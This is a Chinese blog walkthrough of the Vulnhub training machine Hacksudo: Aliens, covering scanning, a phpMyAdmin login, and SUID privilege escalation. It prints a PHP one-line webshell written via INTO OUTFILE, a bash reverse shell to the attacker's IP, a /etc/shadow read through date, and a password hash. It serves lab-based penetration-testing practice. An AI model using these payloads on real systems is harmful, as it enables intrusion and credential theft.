看完这篇 教你玩转渗透测试靶机Vulnhub——Hacksudo: Aliens

已于 2023-11-16 17:52:57 修改
阅读量701 收藏 13
点赞数 21
分类专栏: 渗透测试 # Vulnhub靶机 文章标签: Vulnhub靶机 HacksudoAliens cpulimit提权 date提权 反弹shell
于 2023-10-26 19:39:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Aluxian_/article/details/134061594
版权

Vulnhub靶机Hacksudo: Aliens渗透测试详解

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

PS:需要获得root权限找到flag

Difficulty:Easy (简单的)

Vulnhub靶机下载:

官网下载:https://download.vulnhub.com/hacksudo/HacksudoAliens.zip

Vulnhub靶机安装:

下载好了把安装包解压 然后使用 VMware或者Oracle VM打开即可。

在这里插入图片描述

在这里插入图片描述

Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用arp-scan -l或者netdiscover发现主机

在这里插入图片描述
渗透机:kali IP :172.20.10.5 靶机IP :172.20.10.11

使用命令:nmap -sS -sV -n -T4 -p- 172.20.10.11

在这里插入图片描述
开启了22、80、9000老样子先看80 访问一下 然后扫后台使用工具:dirb,dirsearch,gobuster

在这里插入图片描述
这里扫出来个数据库的备份文件,查看发现账号和密码:vishal/hacksudo

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

②:数据库后台传木马:

访问9000端口,输入账号密码登入数据库后台 登入成功!!

在这里插入图片描述
可以尝试写入一句话木马

 select '<?php @eval($_POST[cmd]);?>'INTO OUTFILE '/var/www/html/cmd.php'

在这里插入图片描述

在这里插入图片描述

③:反弹shell:
 bash -c 'exec bash -i &>/dev/tcp/172.20.10.5/1234 <&1'
 python3 -c ‘import pty;pty.spawn(/bin/bash”)

在这里插入图片描述
在这里插入图片描述

④:提权:
find / -user root -perm -4000 -print 2>/dev/null

在这里插入图片描述

1.date提权:

GTFOBins-datehttps://gtfobins.github.io/gtfobins/date/#suid

这里使用date 进行越权操作 读取shadow 然后john进行爆破
在这里插入图片描述

LFILE=/etc/shadow
date -f $LFILE

在这里插入图片描述

2.cpulimit 提权
echo hacksudo:$6$cOv4E/VKAe0EVwV4$YScCx10zfi7g4aiLY.qo8QPm2iOogJea41mk2rGk/0JM5AtnrmiyTN5ctNJ0KTLS5Iru4lHWYPug792u3L/Um1:18721:0:99999:7::: >> hash.txt

在这里插入图片描述

hacksudo的密码为:aliens直接ssh登录,登入成功!!

在这里插入图片描述
发现没权限在Downloads 下面发现 cpulimit二进制文件 GTFOBins搜一下还真有!

GTFOBins-cpulimithttps://gtfobins.github.io/gtfobins/cpulimit/

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

⑤:获取FLAG:

在这里插入图片描述

至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!

Vulnhub靶机渗透总结:

1.信息收集dirb,dirsearch,gobuster,nikto 工具得使用
2. phpmyadmin后台写文件getshell(一句话木马)
3.date 读取shadowjohn解密shadow
4.cpulimitdate 提权的使用
5.反弹shell 命令: bash -c 'exec bash -i &>/dev/tcp/172.20.10.5/1234 <&1'

🆗又是收获满满的一天最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

落寞的魚丶
关注
  • 21
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 8
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
HACKSUDO_SEARCH靶机详解
weixin_44681307的博客
07-10 102
这个目录其实才是我们正常的一个主页面,在Contact这个页面看到FUZZ,这是个很明显的提示,就是告诉我们这里有个文件包含漏洞,在About页面发现是个me,我也没扫描,直接用me尝试了一下,发现包含页面就是me。这时候就想到了利用环境变量提权,因为原本的install是/usr/bin目录下的install,我们自己伪造一个,让系统执行我们伪造的,并且又是root权限执行,这样我们就拿到了root权限。这个靶场直接是有ip的,然后单独对这个ip做了个扫描,发现并没有什么可用的。
hacksudo:2 (HackDudo) vulnhub靶场(NFS,vbox靶场环境配置)
weixin_62621015的博客
03-21 373
hacksudo2 vulnhub靶场(NFS,vbox靶场环境配置)
Vulnhub靶机hacksudo-Thor
qq_48904485的博客
02-09 887
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机hacksudo-Thor(10.0.2.49)目标:获取靶机root权限和flag靶机下载地址:https://download.vulnhub.com/hacksudo/hacksudo—Thor.zip。
靶机渗透练习97-hacksudo:ProximaCentauri
hirak0的博客
05-10 2407
靶机描述 靶机地址:https://www.vulnhub.com/entry/hacksudo-proximacentauri,709/ Description Box created by hacksudo team members vishal Waghmare , Soham Deshmukh This box should be easy to medium . This machine was created for the InfoSec Prep Discord Server (http
Vulnhub靶机hacksudoLPE
qq_48904485的博客
02-07 839
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机hacksudoLPE(10.0.2.47)目标:获取靶机root权限和flag,该靶机是一个练习提权的靶场,主要以提权为主靶机下载地址:https://www.vulnhub.com/entry/hacksudo-lpe,698/
靶机渗透练习95-hacksudo:3
hirak0的博客
05-08 1265
靶机描述 靶机地址:https://www.vulnhub.com/entry/hacksudo-3,671/ Description This box should be easy . This machine was created for the InfoSec Prep Discord Server (https://discord.gg/tsEQqDJh) The box was created with Virtualbox ,but it should work with VMWare P
Vulnhub】之Nagini
zg_111的博客
04-13 1334
根据之前得到的bak配置文件,我们知道服务器启用了Mysql数据库,并且用户名为goblin,密码为空,接下来我们可以使用gopher协议查询Joomla的后台管理员账密,从而登陆至Web后台进行下一步操作。在hermoine用户文件夹下,我们发现了隐藏的文件夹.mozilla,该文件夹是在linux操作系统中使用firefox浏览器后,在当前用户的目录下就会生成给.mozilla目录,进入该文件夹,可以发现当前浏览器中的安装的扩展包、配置信息及包括浏览器登录某些web应用后记录下的用户名和密码信息。
Vulnhub靶机的下载和使用
laoyanCZ的博客
11-26 778
一、何为Virtualbox? ​​​​​Virtualbox跟Vmware一样,是创建虚拟机的软件,两者的功能基本上是一样的。 那我们为什么要安装Virtualbox呢?因为Vulnhub上面的靶机在导入到Virtualbox会稳定一些,基本上不会出现什么兼容性的问题,而导入到Vmware可能会报一些错误,就导致我们无法正常导入,所以我们一般都用Virtualbox来打开Vulnhub上的靶机。二、博主的渗透环境 博主一般都是习惯于kali安装在Vmware里面,
Vulnhub】靶场之Hacksudo:Aliens
2301_76232299的博客
12-01 5206
信息收集是很重要,思路一步一步的走,就会很轻松了,这个靶机还是蛮有趣了,也不难😁😁😁,有兴趣的可以去!
[Vulnhub靶机] DC-1
最新发布
haosha。的博客
05-07 3902
[Vulnhub靶机]DC-1靶机渗透思路及方法(个人分享)
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机hacksudo-FOG
qq_48904485的博客
02-08 858
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机hacksudo-FOG(10.0.2.48)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/hacksudo-fog,697/
vulnhub靶机DC1
weixin_52450702的博客
10-29 853
靶机DC1IP:192.168.70.160。
靶机vulnhub靶机cybox1
weixin_52450702的博客
02-28 460
vulnhub靶机cybox
python入侵外星人200行代码小游戏
05-18
以下是一个简单的 Python 小游戏,名为“入侵外星人”。这个游戏的目标是射击下降的外星人并得分。游戏有 3 层外星人,每层外星人的移动速度不同,游戏难度逐渐增加。 ```python import pygame import sys from random import randint pygame.init() # 游戏设置 width = 800 height = 600 screen = pygame.display.set_mode((width, height)) pygame.display.set_caption("Alien Invasion") clock = pygame.time.Clock() # 颜色设置 white = (255, 255, 255) black = (0, 0, 0) # 字体设置 font = pygame.font.Font(None, 36) # 外星人设置 alien_width = 50 alien_height = 50 alien_speed = 5 alien_color = (randint(0, 255), randint(0, 255), randint(0, 255)) # 家设置 player_width = 50 player_height = 50 player_speed = 10 player_color = (0, 255, 0) # 子弹设置 bullet_width = 5 bullet_height = 20 bullet_speed = 10 bullet_color = (255, 0, 0) # 游戏状态 game_over = False score = 0 # 外星人生成函数 def generate_aliens(num_rows, num_cols): aliens = [] for row in range(num_rows): for col in range(num_cols): alien = { "x": col * alien_width, "y": row * alien_height, "color": (randint(0, 255), randint(0, 255), randint(0, 255)) } aliens.append(alien) return aliens # 子弹生成函数 def generate_bullet(player_x, player_y): bullet = { "x": player_x + player_width / 2 - bullet_width / 2, "y": player_y - bullet_height, } return bullet # 碰撞检测函数 def collide(rect1, rect2): if (rect1["x"] < rect2["x"] + rect2["width"] and rect1["x"] + rect1["width"] > rect2["x"] and rect1["y"] < rect2["y"] + rect2["height"] and rect1["y"] + rect1["height"] > rect2["y"]): return True return False # 游戏循环 def game_loop(): global game_over, score # 外星人生成 aliens = generate_aliens(3, 10) # 家初始化 player_x = width / 2 - player_width / 2 player_y = height - player_height player_speed_x = 0 # 子弹列表初始化 bullets = [] while not game_over: # 事件循环 for event in pygame.event.get(): if event.type == pygame.QUIT: sys.exit() elif event.type == pygame.KEYDOWN: if event.key == pygame.K_LEFT: player_speed_x = -player_speed elif event.key == pygame.K_RIGHT: player_speed_x = player_speed elif event.key == pygame.K_SPACE: bullet = generate_bullet(player_x, player_y) bullets.append(bullet) elif event.type == pygame.KEYUP: if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT: player_speed_x = 0 # 碰撞检测 for bullet in bullets: for alien in aliens: if collide(bullet, alien): bullets.remove(bullet) aliens.remove(alien) score += 10 for alien in aliens: if collide(alien, {"x": player_x, "y": player_y, "width": player_width, "height": player_height}): game_over = True # 外星人移动 for alien in aliens: alien["y"] += alien_speed if alien["y"] >= height: game_over = True # 家移动 player_x += player_speed_x if player_x < 0: player_x = 0 elif player_x > width - player_width: player_x = width - player_width # 子弹移动 for bullet in bullets: bullet["y"] -= bullet_speed if bullet["y"] < 0: bullets.remove(bullet) # 绘制画面 screen.fill(black) for alien in aliens: pygame.draw.rect(screen, alien["color"], [alien["x"], alien["y"], alien_width, alien_height]) pygame.draw.rect(screen, player_color, [player_x, player_y, player_width, player_height]) for bullet in bullets: pygame.draw.rect(screen, bullet_color, [bullet["x"], bullet["y"], bullet_width, bullet_height]) text = font.render(f"Score: {score}", True, white) screen.blit(text, (10, 10)) pygame.display.update() # 控制游戏速度 clock.tick(30) # 游戏结束 screen.fill(black) text = font.render("Game Over", True, white) screen.blit(text, (width / 2 - 50, height / 2 - 18)) text = font.render(f"Score: {score}", True, white) screen.blit(text, (width / 2 - 50, height / 2 + 18)) pygame.display.update() pygame.time.delay(2000) # 启动游戏 game_loop() ``` 这个游戏使用了 Pygame 库来实现图形界面和事件响应。游戏界面中有外星人、家和子弹三种元素,家可以通过键盘控制家的移动和子弹的射击,同时需要注意外星人的攻击。游戏难度逐步增加,游戏难度越来越高。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

落寞的魚丶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值